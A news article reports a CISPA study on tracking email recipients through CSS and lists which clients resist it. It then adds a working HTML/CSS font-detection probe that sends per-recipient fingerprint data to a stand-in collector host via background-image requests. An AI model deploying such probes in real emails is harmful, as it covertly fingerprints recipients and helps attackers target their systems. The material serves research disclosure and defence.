Collecting Spy Sheets: CSS allows user tracking in emails
Users can be tracked not only on the web, but also in emails. Only a few email clients prevent tracking via CSS.
Users can be tracked in their emails using CSS. Much as usage data is collected on the web, the sender of an email can gather data about the recipient and draw conclusions about the system in use. This is shown by a study conducted by the CISPA Helmholtz Center for Information Security. The browser or mail client, the operating system and other installed programs can be identified from the data, and the system language is also visible via CSS tracking.
Text-based emails protect against CSS tracking
The researchers examined 21 email programs, covering desktop and web clients as well as apps for Android and iOS, and tried various CSS-based techniques to obtain data from each. In 18 cases at least one method succeeded, including against Outlook, Thunderbird and Gmail. With these programs it is possible to identify all email addresses that are read from the same email client, or to link a user's web session with their email account, explains Leon Trampert, who was involved in the study. CSS tracking is ruled out entirely only by text-based emails that contain no CSS. Among the clients studied, Protonmail is the only one that instead relies on obfuscation and loads all CSS-referenced content via a proxy.
On the web, JavaScript and tracking cookies are used to collect usage data and analyze individual users, and a browser's request not to be tracked (such as the Do Not Track header) does not stop them. Because most mail clients block the execution of JavaScript, the researchers investigated what CSS alone offers for tracking. To do this, they tested almost 1200 different combinations of browser and operating system, and in almost 98 percent of cases they were able to deduce system characteristics.
Fonts reveal system information
"Installed fonts are treacherous", explains Trampert. If, for example, a proprietary Microsoft font can be detected, this indicates an existing installation of Microsoft Office. Using CSS's calc() function, the scientists were also able to deduce the operating system. Attackers can use this knowledge to target security gaps in the operating system or installed software and infiltrate systems.
The researchers drew on CSS properties, at-rules and functions. To test whether a font is installed, they created two containers, assigned the font under test to one and a fallback font to the other, and gave both the same fixed font size. Because two fonts render the same text with different glyph widths, the containers end up with different widths if the tested font is present and with identical widths if the client had to fall back in both cases. The calc() function also delivers slightly different results under Windows 10 and 11 than under Linux and macOS, so indications of the operating system can be derived from it as well.
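The following HTML email fragment is an added illustration of the two-container font probe described above; it is not code from the CISPA study or from the article. It assumes a rendering engine that supports CSS container queries, uses `ch` units (the advance width of the glyph "0" in the element's own font) to make each box's width depend on the resolved font without any text or script, and turns the width into a network request to a hypothetical collector URL. The font metrics in the comments (Calibri digits about 0.51em, Courier New about 0.60em) and the thresholds derived from them are assumptions for this example.

```html
<!-- Added example, not the study's code: a CSS-only probe for one font (Calibri,
     shipped with Microsoft Office) that needs no JavaScript to report back. -->
<style>
  /* Both probe boxes are 20ch wide, so their pixel width depends on which
     font the client actually resolved. Making them query containers lets
     @container rules react to that width. */
  .probe {
    container-type: inline-size;
    font-size: 16px;
    width: 20ch;
    height: 1px;
    overflow: hidden;
  }
  /* Box 1: the font under test, with the same fallback chain as box 2. */
  .probe.test     { font-family: "Calibri", "Courier New", monospace; }
  /* Box 2: the fallback alone; it tells the collector what "not installed" looks like here. */
  .probe.fallback { font-family: "Courier New", monospace; }

  /* A background image is only fetched for a box that has an area to paint. */
  .pixel { width: 1px; height: 1px; }

  /* Assumed metrics: Courier New and most monospace fallbacks advance about
     0.60em per digit, so 20ch at 16px is roughly 192px; Calibri's digits are
     about 0.51em, giving roughly 162px. A test box narrower than 170px therefore
     means Calibri was used. Hypothetical collector endpoint; the request itself
     is the signal, the query string says which probe fired for which recipient. */
  @container (max-width: 170px) {
    .test .pixel {
      background-image: url("https://collector.example/probe?box=test&narrow=1&rcpt=123");
    }
  }
  /* The fallback box reports its own width bucket so the server can do the
     comparison from the article: "test narrow" AND "fallback wide" means the
     tested font is installed, while "both narrow" is inconclusive (the
     client's monospace fallback is itself unusually narrow). */
  @container (min-width: 185px) {
    .fallback .pixel {
      background-image: url("https://collector.example/probe?box=fallback&wide=1&rcpt=123");
    }
  }
</style>

<div class="probe test"><div class="pixel"></div></div>
<div class="probe fallback"><div class="pixel"></div></div>
```

Each additional font to test is just another pair of boxes with its own collector URL, and the per-recipient token in the query string is what links the resulting system fingerprint to a mailbox. Clients that strip `<style>`, block remote images, or fetch every referenced URL through a proxy regardless of whether the rule matched (the approach the article attributes to Protonmail) blunt or defeat the probe, and plain-text mail removes it altogether. The calc()-based operating-system check mentioned above would use the same container-query trigger with width expressions whose rounding differs between platforms, but the page gives no concrete values for it, so it is not reproduced here.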
The scientists have published all the results on their institute's website.
(sfe)